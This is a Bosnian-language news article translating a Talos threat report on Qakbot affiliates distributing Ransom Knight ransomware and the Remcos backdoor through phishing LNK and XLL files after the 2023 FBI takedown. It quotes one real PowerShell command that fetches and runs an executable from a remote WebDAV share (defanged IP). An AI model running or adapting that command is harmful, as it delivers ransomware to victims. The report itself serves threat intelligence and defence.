Site icon Kiber.ba

Hakeri povezani s Qakbotom distribuišu Ransom Knight malver uprkos uklanjanju infrastrukture

Hakeri povezani s Qakbotom distribuišu Ransom Knight malver uprkos uklanjanju infrastrukture - Kiber.ba

Hakeri povezani s Qakbotom distribuišu Ransom Knight malver uprkos uklanjanju infrastrukture - Kiber.ba

U operaciji krajem avgusta 2023. u kojoj su učestvovali FBI i mnogi međunarodni partneri, agencije za provođenje zakona zaplijenile su infrastrukturu i imovinu kriptovaluta koje koristi malver Qakbot, nanijevši znatnu štetu operacijama grupe. Mnogi ljudi u sigurnosnoj industriji pitali su se da li bi to značilo da su Qakbot podružnice zauvijek nestale ili su samo privremeno ostali bez posla dok su obnavljali svoju infrastrukturu.

Talos s umjerenim samopouzdanjem procjenjuje da su hakeri iza Qakbota i dalje aktivni i da provode novu kampanju koja je započela neposredno prije uklanjanja, distribuišući varijantu Cyclops/Ransom Knight ransomware-a zajedno sa Remcos backdoorom. Pratili smo ovu novu aktivnost povezujući metapodatke u LNK datotekama korištenim u novoj kampanji sa mašinama korištenim u prethodnim Qakbot kampanjama.

U januaru 2023. napisali smo post na blogu o korištenju metapodataka iz LNK datoteka za identifikaciju i praćenje hakera. Posebno smo detaljno opisali kako je jedna mašina korištena u kampanji “AA”, sa serijskim brojem pogona “0x2848e8a8”, kasnije korištena u kampanji za novi botnet pod nazivom  BB ”. Nakon objave na našem blogu, primarni Qakbot hakeri odgovorni za kampanje  AA”, “BB  i  Obama  počeli su brisati metapodatke u svojim LNK datotekama kako bi otežali otkrivanje i praćenje.

Talos je u augustu 2023. identifikovao nove LNK datoteke koje su kreirane na istom stroju koji je gore referenciran, ali je primijetio da payload fajlova ukazuje na mrežni udio u komandnoj liniji koji služi varijanti Ransom Knight ransomware-a. Daljnja analiza datoteka otkrila je da ukazuju na Powershell.exe i prosljeđuju sljedeće argumente za preuzimanje sljedeće faze:

-c “istraživač ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Gornja naredba otvara Explorer.exe i pokušava pristupiti udaljenom mrežnom dijeljenju na IP 89[.]23[.]96[.]203 koristeći WebDAV na portu 80. Ova metoda može biti pokušaj da se zaobiđe detekcija komandne linije za preuzimanje udaljenog izvršnog programa preko PowerShell-a (T1105 Ingress Tool Transfer).

Nazivi ovih LNK datoteka, s temama hitnih finansijskih pitanja, sugerišu da se distribuišu u phishing e-porukama, što je u skladu s prethodnim kampanjama Qakbota:

Neki od naziva fajlova su napisani na italijanskom, što sugeriše da hakeri možda ciljaju korisnike u tom regionu. LNK datoteke se distribuišu unutar Zip arhiva koje također sadrže XLL datoteku. XLL je ekstenzija koja se koristi za Excel dodatke i dolazi sa ikonom sličnom drugim formatima Excel datoteka:

Zip sadržaj za jedan od phishing priloga.

Prema našoj analizi, ovi XLL fajlovi su Remcos backdoor koji se izvršava zajedno sa Ransom Knightom kako bi se hakerima omogućio pristup stroju nakon infekcije:

VirusTotal informacije za XLL fajl distribuisan uz Ransom Knight LNK downloader.

LNK datoteka, s druge strane, preuzima izvršnu datoteku sa udaljenog IP-a 89[.]23[.]96[.]203 prikazanu u komandnoj liniji iznad putem WebDAV-a, što je stvarni Ransom Knight teret. Ova porodica ransomwarea je ažurirana verzija Cyclops ransomware-as-a-service, prepisana od nule. Haker iza usluge Cyclops najavio je novu varijantu u maju 2023. godine:

Objava na Dark web forumu koja najavljuje Ransom Knight ransomware.

Ne vjerujemo da hakeri Qakbota stoje iza ponude ransomware-as-a-service, već su jednostavno korisnici usluge. Kako je ova nova operacija u toku od početka augusta 2023. i nije prestala nakon uklanjanja, vjerujemo da operacija FBI-a nije uticala na Qakbotovu phishing infrastrukturu za isporuku e-pošte, već samo na njegove komandne i kontrolne servere. Iako nismo vidjeli hakere koji distribuišu Qakbot post-infrastrukturno uklanjanje, procjenjujemo da će zlonamjerni softver vjerovatno nastaviti predstavljati značajnu prijetnju u budućnosti. S obzirom na to da operateri ostaju aktivni, oni mogu odlučiti obnoviti Qakbot infrastrukturu kako bi u potpunosti nastavili svoje aktivnosti prije uklanjanja.

Izvor: Talos

Exit mobile version